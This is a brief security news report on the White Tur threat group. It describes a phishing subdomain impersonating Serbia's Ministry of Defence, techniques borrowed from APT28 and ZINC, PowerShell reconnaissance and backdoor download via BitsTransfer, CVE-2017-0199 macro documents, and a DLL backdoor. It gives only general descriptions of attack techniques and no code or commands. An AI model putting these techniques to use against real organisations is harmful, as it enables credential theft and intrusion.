A threat group called White Tur is seen adopting methods from other advanced persistent threat (APT) actors. The researchers claimed that the newly discovered threat group had been actively conducting cyber-attacks since mid-2017.
The White Tur threat actors registered a subdomain with a URL of “mail[.]mod[.]qov[.]rs.” that has an objective of phishing login credentials of the workers in the Ministry of Defence of Serbia.
The phishing domain utilised a TLS certificate with the term ‘qov’ that impersonates the word gov or “government.” This spoofing technique is used by an APT group known as Sofacy or APT28 and has shown that the White Tur threat group could adopt or borrow some strategies used by sophisticated gangs.
Furthermore, White Tur exploits an open-source project called OpenHardwareMonitor for payload activation. Researchers believed that the threat group copied this technique from a North-Korean cybercriminal group known as ZINC.
The White Tur threat group’s attack method may be from other APT groups, but they can also execute their unique attack methods.
As part of White Tur’s initial attack, a PowerShell code acquires environmental data from their targets by utilising PowerShell WMI objects and pushes BitsTransfer Module in PowerShell for downloading a backdoor.
The threat group utilises macro-enabled documents loaded with different governmental exploits, telecoms, JavaScript backdoor’s HTA, PowerShell scripts, R&D, defence themes, XSL, and macros that abuse the CVE-2017-0199 critical flaw.
Researchers also spotted that the White Tur group deploying a functional backdoor stored as a DLL to manage files, set sleep time of malware, upload or download files, and execute commands.
In addition, the researchers also discovered the name of Storm Kitty in White Tur’s backdoor’s PDB path. Storm Kitty is an open-source malware project created by hackers to gather credentials and log keystrokes.
White Tur’s target selection focuses on low-profile regions such as Serbia to abuse the country’s low threat intelligence coverage. Experts assume that the threat group uses Serbia to practice their attack methods before continuing to more prominent countries.